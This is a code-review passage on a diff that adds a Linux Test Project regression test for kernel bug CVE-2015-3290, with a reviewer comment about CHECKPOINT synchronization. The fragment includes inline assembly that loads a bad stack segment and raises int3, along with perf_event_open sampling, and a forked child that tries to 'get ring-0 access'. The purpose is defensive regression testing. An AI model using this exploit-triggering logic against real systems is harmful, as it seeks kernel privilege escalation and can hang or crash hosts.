testcases/cve/cve-2015-3290.c

```diff
@@ -0,0 +1,579 @@
+		      "3:  int3	   \n\t"
+		      "4:  mov %%esi, %%ebp   \n\t"
+		      : [expected_rsp] "=m" (expected_rsp)
+		      : [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
+			 : "eax", "ecx", "edx", "esi", "flags"
+		);
+#endif
+
+		/*
+		 * If we ended up with IF == 0, there's no easy way to fix
+		 * it.  Instead, make frequent syscalls to avoid hanging
+		 * the system.
+		 */
+		syscall(0x3fffffff);
+	}
+}
+
+static int perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
+			   int cpu, int group_fd, unsigned long flags)
+{
+	int ret;
+
+	ret = ltp_syscall(__NR_perf_event_open, hw_event, pid, cpu,
+			  group_fd, flags);
+	return ret;
+}
+
+static int event_mlock_kb;
+static int max_sample_rate;
+
+static void setup(void)
+{
+        /*
+         * According to perf_event_open's manpage, the official way of
+         * knowing if perf_event_open() support is enabled is checking for
+         * the existence of the file /proc/sys/kernel/perf_event_paranoid.
+         */
+	if (access("/proc/sys/kernel/perf_event_paranoid", F_OK) == -1)
+		tst_brk(TCONF, "Kernel doesn't have perf_event support");
+
+	SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_mlock_kb",
+			"%d", &event_mlock_kb);
+	SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_max_sample_rate",
+			"%d", &max_sample_rate);
+}
+
+static void run(void)
+{
+	struct perf_event_attr pe = {
+		.size = sizeof(struct perf_event_attr),
+		.disabled = 0,
+		.exclude_kernel = 0,
+		.exclude_hv = 0,
+		.freq = 1,
+		.sample_type = PERF_SAMPLE_IP|PERF_SAMPLE_TID|
+			PERF_SAMPLE_TIME|PERF_SAMPLE_CALLCHAIN|
+			PERF_SAMPLE_ID|PERF_SAMPLE_PERIOD,
+	};
+	/* Workaround bug in GCC 4.4.7 (CentOS6) */
+	pe.sample_freq = max_sample_rate / 5;
+
+	struct {
+		__u32 type;
+		__u64 config;
+		const char *name;
+	} perf_events[] = {
+		{
+			.type = PERF_TYPE_HARDWARE,
+			.config = PERF_COUNT_HW_INSTRUCTIONS,
+			.name = "hw instructions",
+		},
+		{
+			.type = PERF_TYPE_HARDWARE,
+			.config = PERF_COUNT_HW_CACHE_REFERENCES,
+			.name = "hw cache references",
+		},
+	};
+
+	int pipe_fds[2], pid, status = 0;
+	void *perf_mmaps[ARRAY_SIZE(perf_events)];
+	unsigned int i;
+	char bf = 0;
+
+	SAFE_PIPE(pipe_fds);
+
+	pid = SAFE_FORK();
+	if (pid == 0) {
+		close(pipe_fds[1]);
+
+		SAFE_READ(1, pipe_fds[0], &bf, sizeof(bf));
+
+		tst_res(TINFO, "attempting to get ring-0 access");
+		do_child();
+		exit(EXIT_FAILURE);
+	}
+
+	SAFE_CLOSE(pipe_fds[0]);
+
+	for (i = 0; i < ARRAY_SIZE(perf_events); i++) {
+		int fd;
+
+		pe.type = perf_events[i].type;
+		pe.config = perf_events[i].config;
+
+		fd = perf_event_open(&pe, pid, -1, -1, 0);
+		if (fd == -1) {
+			if (errno == EINVAL || errno == ENOENT)
+				tst_brk(TCONF | TERRNO,
+					"no hardware counters");
+			else
+				tst_brk(TBROK, "perf_event_open");
+			goto out;
+		}
+
+		perf_mmaps[i] = SAFE_MMAP(NULL, event_mlock_kb * 1024,
+					  PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
+		SAFE_CLOSE(fd);
+	}
+
+
+	SAFE_WRITE(1, pipe_fds[1], &bf, sizeof(bf));
+
```

Comment:
We do have CHECKPOINT interface for parent/child synchronization in the LTP test library.